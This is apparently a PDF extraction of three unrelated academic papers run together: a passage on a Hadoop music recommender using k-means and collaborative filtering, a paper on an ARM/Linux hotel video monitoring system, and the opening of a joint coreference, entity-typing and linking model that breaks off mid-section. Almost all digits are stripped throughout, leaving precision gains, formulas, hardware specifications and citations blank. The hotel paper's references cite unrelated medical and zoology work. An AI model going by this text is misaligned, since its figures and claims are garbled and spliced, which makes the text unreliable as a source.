the idea of dichotomous clustering is to first classify all the points as a cluster and then divide it into two (k = k-means clustering), and then select the class that can minimize the clustering cost function again and divide it into two formula until the number of clusters equals k. the cluster cost function is defined as the sum of squared error of the cluster, as shown in formula ( ). the largest square error sum of a class, this kind of point in the distance from the center of the maximum distance, you need to be divided once again.    icp i cpei  iii. recommended system design this section describes the implementation and testing of the entire system and what frameworks are included in each of the system's features. first of all, introduce the top-level design; then analyze the overall framework of the system, what technologies are needed, and the overall process of the system; finally, we evaluate the recommended results from the accuracy and recall rate of recommendations. a. recommended process the k-means clustering-based collaborative filtering recommendation algorithm proposed in the previous section is mainly divided into two steps, one is to use k-means to implement user clustering, and the other is to perform a recommendation algorithm based on user collaborative filtering thus generating the recommended result. user song recording data songs commonly used labels user clustering collaborative filtering generate recommended results user similarity figure . distributed recommended algorithm flow algorithm parallelization of the flow chart is shown in figure . clustering algorithm is divided into three steps. the first step is to create a user tag model: user log table and song list of commonly used tags through a step mapreduce process to generate user-tag model, the tag file as a cache file for each user's song recording tag statistics in the tag vector increase the number of each position to generate a user label matrix. the second step is to use k-means algorithm to calculate the cluster center point of user label matrix. after several iterations, the relatively stable center point of each cluster is determined. the third step reads the central point file as a cache, in order to classify users, by calculating the user from which one of the nearest center, put this user into which cluster. the user-based collaborative filtering algorithm will recommend collaborative filtering for users in each cluster.this step is divided into a number of steps, including counting the number of a song being listened to, counting the number of a user listening to music, calculating user similarity, generating recommended results. b. recommended system architecture design the recommended system is divided into the recommended algorithm layer, server-side and client. the recommended algorithm layer uses hadoop cluster for distributed recommendation, the server side uses the java servlet and mysql database for development, and the client side uses android for display[ ]. log collection is international conference on sensor network and computer engineering (icsnce ) collected using the etl tool sqoop. system overall framework is shown in figure . it can be seen from the figure that the recommended system is divided into major parts: top-level client, server, database and hadoop layer. the client uses the android system for display. server development uses java ee development. database uses mysql. 
mysql is the intermediate data link between the client and the recommendation system. data is stored in the database so that front-end servers and hadoop are decoupled. the transfer of data between the database and hadoop takes the sqoop. sqoop is a distributed log collection system based on hadoop, which requires hadoop to run, which can also speed up data transfer. the collected data is stored in hdfs. the hadoop layer is divided into two parts, one is hdfs data storage, and the other is mapreduce distributed computing. mapreduce reads the data from hdfs and calculates it, and then saves the results back to hdfs. sqoop reads data from the hdfs and transfers to mysql, the client requests the server at irregular intervals, the server reads data from the database and returns it to the client, and the user's operation of songs is fed back to the server and saved to the database[ ]. hadoop android webservice mysql hdfs mapreduce sqoop figure . recommended system architecture c. recommended system function module analysis when users use the recommendation system, the system recommends different songs to different users, which requires users to log in the system with different user names. in order to log in, the system also has to provide the user registration function. to listen to different songs, users must also be able to search for songs and add tags to the songs. because we have no songs to play, we also need a collection or a favorite feature for users[ ]. the server side designs the corresponding interfaces based on these requirements, and the database also designs different tables to store the content. accordingly, we have designed the function diagram of the system, as shown in figure . as can be seen from the figure, the system function is decomposed into four modules. clients have user registration, login, search songs, tag songs and play features. play actually refers to favorites or likes. because the song involves copyright issues, it can only be replaced by favorites or likes. these functions correspond to the server-side interface to provide data. data is read from the database, so the database is designed with three tables: the user table, used to register and log in; the table for recording users' listening to songs, with the largest amount of data; song table storage song's basic information, including tag information, search songs and add tags[ ]. mysql client register login search add tag play service registration interface login interface search interface add interface user tablerecord list of listening to songs song list hadoop collaborative filtering k-means clustering sqoop figure . recommended system function block diagram iv. design of hadoopbased recommendation system algorithm parallelization is based on the k-means clustering algorithm introduced in the previous chapter and user-based collaborative filtering recommendation algorithm is implemented in the distributed system, the distributed international conference on sensor network and computer engineering (icsnce ) recommendation algorithm is divided into two modules, one is distributed k-means clustering algorithm, one is the distributed collaborative filtering recommendation algorithm, and finally the two algorithms connected to achieve the work of the entire distributed recommendation algorithm[ ]. a. k-means clustering of parallel design the data input of the k-means algorithm is a matrix, because here the user is clustered, so the user-label matrix is first formed by data preprocessing. 
user listening records are large files and need to be designed in parallel. listener recorded data into the hdfs behind the addition of each song's label, the formation of (user id, song id, song time, label) this format records. then use mapreduce to parallelize the user-label matrices in one step. then the user-label matrix is clustered. the clustering and parallelization algorithm is designed as follows: the first step scans all the original points and randomly selects k points as the center point of the first step cluster. the second step is to calculate the cluster of all the points to each center point, and to point each point to the closest center point cluster. the third step to repeat the second step to meet the termination conditions[ ]. the fourth step is to calculate all the user points, the user assigned to their respective clusters. algorithm architecture is shown in figure . mapreduce数据源 hdfs userlog.txt songtags.txt user record mapping song label mapping utmatrixmapper utmatrixreduce user label matrix kmeansmapper kmeansreducer kmeansdriver cluster center user clustering kmeansclustermapper kmeanscombiner figure . distributed k-means clustering algorithm architecture b. concurrent design of user-based collaborative filtering recommendation algorithm according to the formula ( ) and ( ) in the first section, combined with the rules of hadoop distributed design, the following steps are designed for the recommendation algorithm: the first step is to count how many songs each user listens to; the second step is to count the number of times each song is heard; the third step is to calculate the similarity of every two users, but only the similarity of the two users who have heard the same song need to be computed; the fourth step, is to calculate each user's recommending value for each song to form a recommend list; the final step is to sum up the recommending values for a user listening to the same song. the above steps are implemented based on mapreduce, and the entire work flow requires a number of map and reduce to complete. figure shows the mapreduce architecture based on the user collaborative filtering algorithm. userlistencountmapper userlistencountreduce songlistenedcountmapper songlistenedcountreduce usersimilaritymapper usersimilarityreduce usercommendsimmapper usercommendlogmapper usercommendreducer mapreduce userlog.txt mapping user listening records user songs recorded and the number the number of songs to be heard user similarity file 源数据 user song interest value hdfs generate recommended results usersongvaluemapper usersongvaluereducer figure . distributed architecture based on user collaborative filtering algorithm v. experiments and evaluation in the same situation as the data-set, many times of repeated experiments were done on the traditional user-based collaborative filtering algorithm, the recommendation algorithm after introducing k-means clustering and the recommendation algorithm after the improved clustering. and the stable results were selected to analyze [ ]. a. experimental environment and data set international conference on sensor network and computer engineering (icsnce ) environment construction and configuration include hadoop cluster, sqoop, development environment and web server. the cluster environment is built using vmware virtual machines. the cluster is built using three nodes, one master and two slaves.  host configuration hardware environment: cpu intel i - , quad-core, . 
v. experiments and evaluation

under the same data set, repeated experiments were carried out on the traditional user-based collaborative filtering algorithm, the recommendation algorithm after introducing k-means clustering, and the recommendation algorithm after the improved clustering, and stable results were selected for analysis[ ].

a. experimental environment and data set

the environment construction and configuration cover the hadoop cluster, sqoop, the development environment, and the web server. the cluster environment is built with vmware virtual machines and consists of three nodes, one master and two slaves.

- hardware environment: cpu intel i - , quad-core, . ghz, ram gb;
- software environment: os centos , java environment jdk . , server tomcat . , hadoop . . ;
- development environment: eclipse, windows , hadoop plugin;
- data set: the music data used in this experiment are from the network, including more than , users, more than , , user operations, and tags.

b. results

figure shows a screenshot of the recommendation results on the android phone.

figure . android mobile music recommendation results

c. evaluation indices

precision and recall [ ] are used as evaluation indices. each user's song records are sorted by date in descending order, with the top % used as the training set and the remaining % as the test set for the experimental evaluation. formulas ( ) and ( ) define precision and recall respectively:

precision = (number of correctly recommended results / number of recommended results) × 100%    ( )
recall = (number of correctly recommended results / number of songs the user likes) × 100%    ( )

a short sketch of how these two indices are computed over the test set is given below.
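a minimal sketch of the evaluation computation, assuming the recommended list and the test-set likes are available as python sets per user (the data structures and names are ours):

```python
# illustrative evaluation sketch: precision and recall of top-n recommendation,
# following formulas ( ) and ( ) above. data structures are assumptions.
def precision_recall(recommended, liked):
    """recommended: set of recommended song ids; liked: set of songs the user likes (test set)."""
    correct = recommended & liked
    precision = 100.0 * len(correct) / len(recommended) if recommended else 0.0
    recall = 100.0 * len(correct) / len(liked) if liked else 0.0
    return precision, recall

print(precision_recall({"s1", "s2", "s3"}, {"s2", "s3", "s5"}))  # (66.66..., 66.66...)
```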
d. line contrast charts of the three algorithms

after repeated experiments, the change of precision with the k value for the three algorithms is shown in the line chart of figure . as shown in figure , the precision after introducing the k-means clustering algorithm is better than that of the traditional collaborative filtering algorithm, and when the k value is , the precision is increased by about . %, which is the best classification. after the clustering algorithm is improved, the precision is nearly . % higher than the unimproved version when the k value is . figure shows the change of recall for the three algorithms. the recall of the k-means clustering algorithm is better than that of the traditional collaborative filtering algorithm, and when the k value is , the recall increases by about . %. when the k value is , the recall increases by nearly . % after the clustering algorithm is improved; but as the k value increases further, the improved clustering falls below the unimproved clustering algorithm. because the number of users is fixed, every cluster is affected once the free points are removed; some clusters contain very few users, so their recommendation results become inaccurate and the overall effect of the recommendation algorithm suffers.

figure . the change of precision with the k value

figure . the change of recall with the k value

vi. concluding remarks

this paper presents the design and implementation of a hadoop-based music recommendation system, improves the traditional user-based collaborative filtering recommendation algorithm, and raises the precision of the recommendation by clustering users on song tags. hadoop, a scalable and high-performance distributed computing platform, provides a reference for the design of a music recommendation system in the context of big data. the recommendation algorithm combining k-means clustering and collaborative filtering is designed on the mapreduce distributed framework, which has reference value for the distributed design of recommendation algorithms.

references
[ ] trustdata. china mobile internet development analysis report for the first half of [eb/ol]. ( - - ). http://itrustdata.com/#service
[ ] xiang liang. recommended system practice[m]. beijing: people post press, . : - .
[ ] zhang xin-sheng, zhang hai-ying, mao qian. hadoop[eb/ol]. ( - - ). https://baike.baidu.com/item/hadoop/
[ ] wu hongchen, wang xinjun, cheng yong, peng zhaohui. advanced recommendation based on collaborative filtering and partition clustering[j]. computer research and development, , (s ): - .
[ ] zheng jie. machine learning algorithm principles and programming practice[m]. beijing: electronic industry press, . :
[ ] weston j, bengio s, hamel p, et al. large-scale music annotation and retrieval: learning to rank in joint semantic spaces[j]. arxiv: learning, .
[ ] van den oord a, dieleman s, schrauwen b, et al. deep content-based music recommendation[c]. neural information processing systems, : - .
[ ] su j, chang w, tseng v s, et al. personalized music recommendation by mining social media tags[j]. procedia computer science, : - .
[ ] davidson j, liebald b, liu j, et al. the youtube video recommendation system[c]. conference on recommender systems, : - .
[ ] feng ya-li, jiang jie, tian feng. research on the combined recommendation algorithm based on item and user[j]. information technology, , ( ): - .
[ ] chang xiao-yu, yu zheng-sheng. point-of-interest recommendation algorithm introducing time attenuation item[j]. journal of hangzhou dianzi university (natural sciences), , ( ): - . [ - - ]. doi: . /j.cnki.hdu. . .
[ ] zhao z, shang m. user-based collaborative-filtering recommendation algorithms on hadoop[c]. knowledge discovery and data mining, : - .
[ ] chen yaxi. music recommendation system and related technologies[j]. computer engineering and applications, , ( ): - .

design of the hotel monitoring system for the image and video collection
wang pengfei
school of leisure management, xi'an eurasia university, xi'an, china
e-mail: wangpf @ .com

abstract—with increasing attention to hotel security, an effective hotel monitoring system is required. based on the samsung s c processor, the proposed system uses the linux operating system to implement intelligent video surveillance. combining an image acquisition program with the embedded boa web server, an intelligent video image acquisition system is designed. the system captures images with a usb camera and builds an embedded web server, which together complete the image acquisition, image processing, and image transmission functions; the acquired result can ultimately be viewed on a pc in the local area network through a web page.

keywords-video sensor; linux; usb camera; v l ; web server

i. introduction

there are many products on the market for hotel monitoring, but these products are often expensive and cannot be widely applied to all kinds of hotels. for this reason, this system uses the linux operating system on an arm processor to construct the monitoring system, which can be widely deployed in hotel lobbies, stairways, and building dead ends, so as to ensure real-time monitoring of the hotel in all directions [ ].

ii. the structure of the system

this system is based on an embedded linux system and is composed of software and hardware [ ]. it includes the image and video collection module, the display module, the data processing module, and the transmission module. the network transmission environment is a lan. the structure of the system is shown in figure .

figure . overall structure diagram of the system (image acquisition module, data processing module, data transmission module, video display module, local network)
the image acquisition module collects image data through the usb camera [ ]. the data processing module mainly deals with user commands and the handling of the generated data. the data transmission module adopts the currently popular browser/web server mode: the embedded web server communicates with the client pc browser in the http data format. the image display module is the pc in the lan, which sends data requests to the web server through web pages in the browser [ ].

iii. the monitoring system structure

according to the functional requirements of this system, the following hardware devices are needed; the specific hardware structure is shown in figure .

figure . the system hardware structure (arm s c running linux; usb camera; sdram/flash; dm network chip; rs serial debug interface; wireless network router; pc running windows displaying web video over tcp/ip)

in figure , the arm s c is the main chip of the system. the image data is collected by the usb camera, and the collected images are stored in sdram to facilitate transfer [ ]. the video data is stored in flash. through the dm network card, the network module communicates with the development board. at the same time, the rs serial communication interface links the monitoring system and the pc. the wireless network connects the wireless lan and the development board for wireless communication.

iv. design and implementation of the image acquisition module

a. design of the software system

based on the linux operating system, the image acquisition program, the boa web server, and the cgi/html pages are combined together [ ]. the software structure is shown in figure .

figure . the system software structure (linux operating system; image acquisition program; boa web server with cgi; web display program with html)

the operating system manages the processors, the memory, the devices, and the user interfaces. the linux operating system can be trimmed down to the required functions [ ]. the application program accesses the device through the related api and controls the hardware through the driver.

b. design and implementation of the image acquisition module

v l (video linux) is the driver framework for video devices in the linux kernel. it provides a unified function interface for upper-layer applications to access the underlying video devices. v l supports multiple hardware devices, and the running framework of v l in linux is shown in figure .

figure . the structure of v l (application; v l device node /dev/video x; character device driver core; v l driver core (v l -dev.c); v l driver (struct video_device); camera driver; camera hardware)

as seen from figure , the framework mainly includes four parts, listed in table .

table . the frame structure of v l
- character device driver core: v l is a character device that has all the features of a character device and provides the interface to the user.
- v l driver core: builds a standard video device driver framework in the kernel and provides a uniform interface function for video operations.
- v l driver: implements the v l driver according to the platform characteristics, including registering the video device.
- camera device driver: handles power, working clock, video image cropping, and the io interface; implements the various device control methods for upper-level calls and registers v l _subdev.

a brief application-level capture sketch is given below, before the acquisition program itself is described.
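as a minimal illustration of what the application layer does on top of this driver stack, the following python sketch grabs a frame and saves it as a jpeg. it uses opencv's videocapture (whose capture backend on linux sits on top of v l ) purely for illustration; the paper's actual program is written against the v l ioctl interface in c, and the device index and file names here are assumptions.

```python
import cv2  # opencv; on linux its video capture backend wraps v4l2

# illustrative sketch only: grab one frame from the usb camera and save it as jpeg.
# the real system opens the /dev/video device directly via v4l2 ioctls and mmap.
def capture_frame(device_index=0, out_path="frame.jpg"):
    cap = cv2.VideoCapture(device_index)        # open the camera device
    if not cap.isOpened():
        raise RuntimeError("cannot open camera device")
    ok, frame = cap.read()                      # read a single frame
    cap.release()
    if not ok:
        raise RuntimeError("frame capture failed")
    cv2.imwrite(out_path, frame)                # jpeg compression chosen by file extension
    return out_path

if __name__ == "__main__":
    print(capture_frame())
```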
c. the video image acquisition program

after the embedded processor obtains the image information, the jpeg compression program is executed and the image acquisition is completed. finally, video coding is carried out with the mpeg- video coding standard. the process of video image acquisition is shown in figure .

figure . the image collection flow chart (start; open the device file; acquire the driver information; memory mapping; single-frame collection into video data; when collection ends, compress the video; end)

first, the system creates a file to save the collected image information. next, it opens the usb camera device; with the device file open, it obtains the driver information of the device. after the image format is configured, the image buffers are requested [ ]. then the kernel-space image buffers are mapped into user space. finally, the camera captures the image data and the collected data are saved into the driver's buffer [ ].

d. design and implementation of image transmission

after the video image files have been collected, the web server is established. through the network protocol, the client can browse the website and download the files; this is the mainstream browser/server mode [ ]. considering the characteristics of the embedded linux system and the hardware resources of the development board (the dm network chip), the communication between the web server and the client uses the tcp/ip protocol, and the cgi program realizes the video data transmission. the transfer between the development board, the server, and the client is shown in figure .

figure . the network transmission based on the tcp/ip protocol (video image files on the web server; router; wired and wireless clients over tcp/ip)

the dm network chip sets the ip address and the physical address of the development board. when the development board runs the normal linux system and its rj interface is connected to the router through a cable, the wired and wireless devices in the same local area network can communicate with it.

v. test result of the image transmission

a. design of the cgi and html web pages

the system can browse and download the video files collected by the development board on a web page [ ]. the server therefore needs to respond to requests from the client web page and access the files on the server through a cgi (common gateway interface) program. the cgi program's model on the server is shown in figure .

figure . the flow chart of the cgi (client web browser; boa web server platform; common gateway interface cgi program; collected image files; http/html)

the cgi program runs on the server, and the client sends a cgi request through the html pages to the server. after the server receives the request, the specified cgi application is executed, and the cgi application then sends the result to the client web browser. the result is formatted as html and displayed by the browser.

b. the test results

in this paper, our school hotel is used as an example to implement and test the functions of the above system. the system runs stably and smoothly, and completes the image and video acquisition and the client's web page display [ ]. the monitoring result is shown in figure .
figure . the test result of the proposed monitoring system

vi. conclusions

all-around monitoring of the hotel has become a basic condition for safety. compared with manual monitoring, video surveillance is not only compact, stable, and safe, but also free of the "dead angle" (blind spot) phenomenon. based on these characteristics, the proposed video acquisition and transmission system has a very good market prospect.

acknowledgment

this work was partly supported by the shaanxi province social science fund project (no. r ) of china and the scientific research fund project of the shaanxi provincial department of education ( jk ).

references
[ ] d. zhang, j. han, and l. jiang, et al., "revealing event saliency in unconstrained video collection", ieee transactions on image processing, vol. , jan. , pp. - , doi: . /tip. . .
[ ] w. h. gross, video circuits collection, analog circuit design, rd ed., vol. . elsevier inc.: , pp. - .
[ ] d. hai, t. hua, "a video processing system for automated traffic data collection of gap size for roundabouts", proc. ieee symp. electrical and computer engineering, ieee press, jun. , pp. - , doi: . /ccece. . .
[ ] x. zhang, x. li, and l. k., "remote video monitoring system based on arm and linux", microcomputer & its applications, vol. , jul. , pp. - , doi: . /icicip. .
[ ] e. aytac, h. erem, and h. remzi f., et al., "a novel data collection and monitoring system for health status measures in patients undergoing lateral internal sphincterotomy: the knowledge program (tkp)", asian journal of surgery, vol. , may , pp. - , doi: . /j.asjsur. . . .
[ ] m. z. a. bhuiyan, j. wu, and g. wang, et al., "quality-guaranteed event-sensitive data collection and monitoring in vibration sensor networks", ieee transactions on industrial informatics, vol. , feb. , pp. - , doi: . /tii. . .
[ ] y. l. hwang, y. e. shin, "unrestrained electrocardiograph based on textile electrode and smartphone application for assessment of bicycle exercise", journal of biomedical engineering research, vol. , may , pp. - , doi: . /jber. . . . .
[ ] c. habib, a. makhoul, and r. darazi, "self-adaptive data collection and fusion for health monitoring based on body sensor networks", ieee transactions on industrial informatics, vol. , jun. , pp. - , doi: . /tii. . .
[ ] h. liang, "application function and daily management decision of hotel data center", talanta, vol. , apr. , pp. - , doi: . /icmii- . . .
[ ] a. gunawan, h. c. lau, and p. vansteenwegen, "orienteering problem: a survey of recent variants, solution approaches and applications", european journal of operational research, vol. , feb. , pp. - , doi: . /j.ejor. . . .
[ ] g. donatelli, r. chiche, and f. cereatti, et al., "endoscopic drainage of intra-abdominal collection after bariatric surgery", obesity surgery, vol. , jun. , pp. - , doi: . /s - - - .
[ ] f. e. clark, s. l. davies, and a. w. madigan, et al., "cognitive enrichment for bottlenose dolphins (tursiops truncatus): evaluation of a novel underwater maze device", zoo biology, vol. , jun. , pp. - , doi: . /zoo. .
a joint model for entity analysis: coreference, typing, and linking greg durrett and dan klein computer science division university of california, berkeley {gdurrett,klein}@cs.berkeley.edu abstract we present a joint model of three core tasks in the entity analysis stack: coreference res- olution (within-document clustering), named entity recognition (coarse semantic typing), and entity linking (matching to wikipedia en- tities). our model is formally a structured con- ditional random field. unary factors encode local features from strong baselines for each task. we then add binary and ternary factors to capture cross-task interactions, such as the constraint that coreferent mentions have the same semantic type. on the ace and ontonotes datasets, we achieve state-of-the- art results for all three tasks. moreover, joint modeling improves performance on each task over strong independent baselines. introduction how do we characterize the collection of entities present in a document? two broad threads exist in the literature. the first is coreference resolution (soon et al., ; ng, ; pradhan et al., ), which identifies clusters of mentions in a document referring to the same entity. this process gives us ac- cess to useful information about the referents of pro- nouns and nominal expressions, but because clusters are local to each document, it is often hard to situate document entities in a broader context. a separate line of work has considered the problem of entity linking or “wikification” (cucerzan, ; milne and witten, ; ji and grishman, ), where mentions are linked to entries in a given knowledge system available at http://nlp.cs.berkeley.edu base. this is useful for grounding proper entities, but in the absence of coreference gives an incom- plete picture of document content itself, in that nom- inal expressions and pronouns are left unresolved. in this paper, we describe a joint model of corefer- ence, entity linking, and semantic typing (named en- tity recognition) using a structured conditional ran- dom field. variables in the model capture deci- sions about antecedence, semantic type, and entity links for each mention. unary factors on these vari- ables incorporate features that are commonly em- ployed when solving each task in isolation. bi- nary and higher-order factors capture interactions between pairs of tasks. for entity linking and ner, factors capture a mapping between ner’s seman- tic types and wikipedia’s semantics as described by infoboxes, categories, and article text. coreference interacts with the other tasks in a more complex way, via factors that softly encourage consistency of semantic types and entity links across coreference arcs, similar to the method of durrett et al. ( ). figure shows an example of the effects such fac- tors can capture. the non-locality of coreference factors make exact inference intractable, but we find that belief propagation is a suitable approximation technique and performs well. our joint modeling of these three tasks is moti- vated by their heavy interdependencies, which have been noted in previous work (discussed more in section ). entity linking has been employed for coreference resolution (ponzetto and strube, ; rahman and ng, ; ratinov and roth, ) and coreference for entity linking (cheng and roth, ) as part of pipelined systems. past work has transactions of the association for computational linguistics, vol. , pp. – , . action editor: jason eisner. submitted / ; revised / ; published november , . 
c© association for computational linguistics. revenues of $ . billion were posted by dell . the company ... en.wikipedia.org/wiki/dell en.wikipedia.org/wiki/michael_dell infobox type: company infobox type: person organization person figure : coreference can help resolve ambiguous cases of semantic types or entity links: propagating information across coreference arcs can inform us that, in this context, dell is an organization and should therefore link to the article on dell in wikipedia. shown that tighter integration of coreference and entity linking is promising (hajishirzi et al., ; zheng et al., ); we extend these approaches and model the entire process more holistically. named entity recognition is improved by simple coreference (finkel et al., ; ratinov and roth, ) and knowledge from wikipedia (kazama and torisawa, ; ratinov and roth, ; nothman et al., ; sil and yates, ). joint models of corefer- ence and ner have been proposed in haghighi and klein ( ) and durrett et al. ( ), but in neither case was supervised data used for both tasks. tech- nically, our model is most closely related to that of singh et al. ( ), who handle coreference, named entity recognition, and relation extraction. our sys- tem is novel in three ways: the choice of tasks to model jointly, the fact that we maintain uncertainty about all decisions throughout inference (rather than using a greedy approach), and the feature sets we deploy for cross-task interactions. in designing a joint model, we would like to preserve the modularity, efficiency, and structural simplicity of pipelined approaches. our model’s feature-based structure permits improvement of fea- tures specific to a particular task or to a pair of tasks. by pruning variable domains with a coarse model and using approximate inference via belief propaga- tion, we maintain efficiency and our model is only a factor of two slower than the union of the individual our model could potentially be extended to handle relation extraction or mention detection, which has also been addressed in past joint modeling efforts (daumé and marcu, ; li and ji, ), but that is outside the scope of the current work. models. finally, as a structured crf, it is concep- tually no more complex than its component models and its behavior can be understood using the same intuition. we apply our model to two datasets, ace and ontonotes, with different mention standards and layers of annotation. in both settings, our joint model outperforms our independent baseline mod- els. on ace, we achieve state-of-the-art entity link- ing results, matching the performance of the system of fahrni and strube ( ). on ontonotes, we match the performance of the best published coref- erence system (björkelund and kuhn, ) and outperform two strong ner systems (ratinov and roth, ; passos et al., ). motivating examples we first present two examples to motivate our ap- proach. figure shows an example of a case where coreference is beneficial for named entity recogni- tion and entity linking. the company is clearly coreferent to dell by virtue of the lack of other possi- ble antecedents; this in turn indicates that dell refers to the corporation rather than to michael dell. this effect can be captured for entity linking by a fea- ture tying the lexical item company to the fact that company is in the wikipedia infobox for dell, thereby helping the linker make the correct decision. 
this would also be important for recovering the fact that the mention the company links to dell; how- ever, in the version of the task we consider, a men- tion like the company actually links to the wikipedia article for company. figure shows a different example, one where the coreference is now ambiguous but entity linking is transparent. in this case, an ner system based on surface statistics alone would likely predict that freddie mac is a person. however, the wikipedia article for freddie mac is unambiguous, which al- lows us to fix this error. the pronoun his can then be correctly resolved. these examples justify why these tasks should be handled jointly: there is no obvious pipeline order for a system designer who cares about the perfor- monospaced fonts indicate titles of wikipedia articles. this decision was largely driven by a need to match the ace linking annotations provided by bentivogli et al. ( ). organization person donald layton took the helm of freddie mac after his ... nil en.wikipedia.org/wiki/freddie_mac person figure : entity links can help resolve ambiguous cases of coreference and entity types. standard ner and coreference systems might fail to handle freddie mac correctly, but incorporating semantic information from wikipedia makes this decision easier. mance of the model on all three tasks. model our model is a structured conditional random field (lafferty et al., ). the input (conditioning con- text) is the text of a document, automatic parses, and a set of pre-extracted mentions (spans of text). mentions are allowed to overlap or nest: our model makes no structural assumptions here, and in fact we will show results on datasets with two different men- tion annotation standards (see section . and sec- tion . ). figure shows the random variables in our model. we are trying to predict three distinct types of annotation, so we naturally have one variable per annotation type per mention (of which there are n): • coreference variables a = (a , . . . ,an) which indicate antecedents: ai ∈{ , . . . , i− , new}, indicating that the mention refers to some pre- vious mention or that it begins a new cluster. • named entity type variables t = (t , . . . , tn) which take values in a fixed inventory of se- mantic types. • entity link variables e = (e , . . . ,en) which take values in the set of all wikipedia titles. in addition we have variables q = (q , . . . ,qn) which represent queries to wikipedia. these are ex- plained further in section . . ; for now, it suffices for the next few sections, we assume a fixed-mention ver- sion of the ner task, which looks like multi-way classification of semantic types. in section . . , we adapt the model to the standard non-fixed-mention setting for ontonotes. } dell posted revenues ... the company ... } dell michael_dell ... new cluster dellnew cluster } company company (song) ... } }person organization ... }person organization ... }the company company company }dell dell n e r c or ef l in k q q e e a a t t figure : random variables and task-specific factors present in our model. the ai model coreference an- tecedents, the ti model semantic types, the ei model en- tity links, and the qi are latent wikipedia queries. factors shown for each task integrate baseline features used when that task is handled in isolation. coreference factors are described in section . . , ner factors are described in section . . , and entity linking factors are described in section . . . to remark that they are unobserved during both train- ing and testing. 
we place a log-linear probability distribution over these variables as follows:

$p(a, t, e \mid x; \theta) \propto \sum_{q} \exp\big(\theta^\top f(a, t, e, q, x)\big)$

where $\theta$ is a weight vector, $f$ is a feature function, and $x$ indicates the document text, automatic parses, and mention boundaries. we represent the features in this model with standard factor graph notation; features over a particular set of output variables (and x) are associated with factors connected to those variables. figure shows the task-specific factors in the model, discussed next in section . higher-order factors coupling variables between tasks are discussed in section . .

independent model

figure shows a version of the model with only task-specific factors. though this framework is structurally simple, it is nevertheless powerful enough for us to implement high-performing models for each task. state-of-the-art approaches to coreference (durrett and klein, ) and entity linking (ratinov et al., ) already have this independent structure and ratinov and roth ( ) note that it is a reasonable assumption to make for ner as well. in this section, we describe the features present in the task-specific factors of each type (which also serve as our three separate baseline systems).

. . coreference

our modeling of the coreference output space (as antecedents chosen for each mention) follows the mention-ranking approach to coreference (denis and baldridge, ; durrett and klein, ). our feature set is that of durrett and klein, targeting surface properties of mentions: for each mention, we examine the first word, head word, last word, context words, the mention's length, and whether the mention is nominal, proper or pronominal. anaphoricity features examine each of these properties in turn; coreference features conjoin various properties between mention pairs and also use properties of the mention pair itself, such as the distance between the mentions and whether their heads match. note that this baseline does not rely on having access to named entity chunks.

. . named entity recognition

our ner model places a distribution over possible semantic types for each mention, which corresponds to a fixed span of the input text. we define the features of a span to be the concatenation of standard ner surface features associated with each token in that chunk. we use surface token features similar to those from previous work (zhang and johnson, ; ratinov and roth, ; passos et al., ): for tokens at offsets of {− , − , , , } from the current token, we fire features based on ) word identity, ) pos tag, ) word class (based on capitalization, presence of numbers, suffixes, etc.), ) word shape (based on the pattern of uppercase and lowercase letters, digits, and punctuation), ) brown cluster prefixes of length , , , using the clusters from koo et al. ( ), and ) common bigrams of word shape and word identity. pairwise potentials in sequence-based ner are useful for producing coherent output (e.g. prohibiting configurations like o i-per), but since we have so far defined the task as operating over fixed mentions, this structural constraint does not come into play for our system.

. . entity linking

our entity linking system diverges more substantially from past work than the coreference or ner systems. most entity linking systems operate in two distinct phases (cucerzan, ; milne and witten, ; dredze et al., ; ratinov et al., ). first, in the candidate generation phase, a system generates a ranked set of possible candidates for a given mention by querying wikipedia. the standard approach for doing so is to collect all hyperlinks in wikipedia and associate each hyperlinked span of text (e.g. michael jordan) with a distribution over titles of wikipedia articles it is observed to link to (michael jordan, michael i. jordan, etc.). second, in the disambiguation phase, a learned model selects the correct candidate from the set of possibilities. as noted by hachey et al. ( ) and guo et al. ( ), candidate generation is often overlooked and yet accounts for large gaps in performance between different systems. it is not always clear how to best turn the text of a mention into a query for our set of hyperlinks. for example, the phrase chief executive michael dell has never been hyperlinked on wikipedia. if we query the substring michael dell, the highest-ranked title is correct; however, querying the substring dell returns the article on the company. our model for entity linking therefore includes both predictions of final wikipedia titles ei as well as latent query variables qi that model the choice of query. given a mention, possible queries are all prefixes of the mention containing the head with optional truecasing or lemmatization applied. unary factors on the qi model the appropriateness of a query based on surface text of the mention, investigating the following properties: whether the mention is proper or nominal, whether the query employed truecasing or lemmatization, the query's length, the pos tag sequence within the query and the tag immediately preceding it, and whether the query is the longest query to yield a nonempty set of candidates for the mention. this part of the model can learn, for example, that queries based on lemmatized proper names are bad, whereas queries based on lemmatized common nouns are good. our set of candidate links for a mention is the set of all titles produced by some query. a small sketch of this query-based candidate generation is given below.
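the following sketch illustrates query-based candidate generation. the hyperlink-count dictionary and all names are invented for illustration, and the query set shown (spans of the mention ending at the head) is a simplification of the query generation described above; the real system also applies truecasing and lemmatization and scores queries with learned unary factors.

```python
# illustrative sketch of candidate generation for entity linking.
# link_counts maps a hyperlinked span of text to the wikipedia titles it links to,
# with counts, e.g. {"dell": {"Dell": 900, "Michael_Dell": 100}}; it is assumed given.
def candidate_queries(mention_tokens, head_index):
    """simplified query set: spans of the mention that end at the head word."""
    return [" ".join(mention_tokens[start : head_index + 1]) for start in range(head_index + 1)]

def generate_candidates(mention_tokens, head_index, link_counts):
    candidates = {}
    for query in candidate_queries(mention_tokens, head_index):
        for title, count in link_counts.get(query.lower(), {}).items():
            candidates[title] = candidates.get(title, 0) + count
    # rank candidate titles by how often the queries are observed to link to them
    return sorted(candidates, key=lambda t: -candidates[t])

link_counts = {"michael dell": {"Michael_Dell": 50}, "dell": {"Dell": 900, "Michael_Dell": 100}}
print(generate_candidates(["michael", "dell"], 1, link_counts))  # ['Dell', 'Michael_Dell']
```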
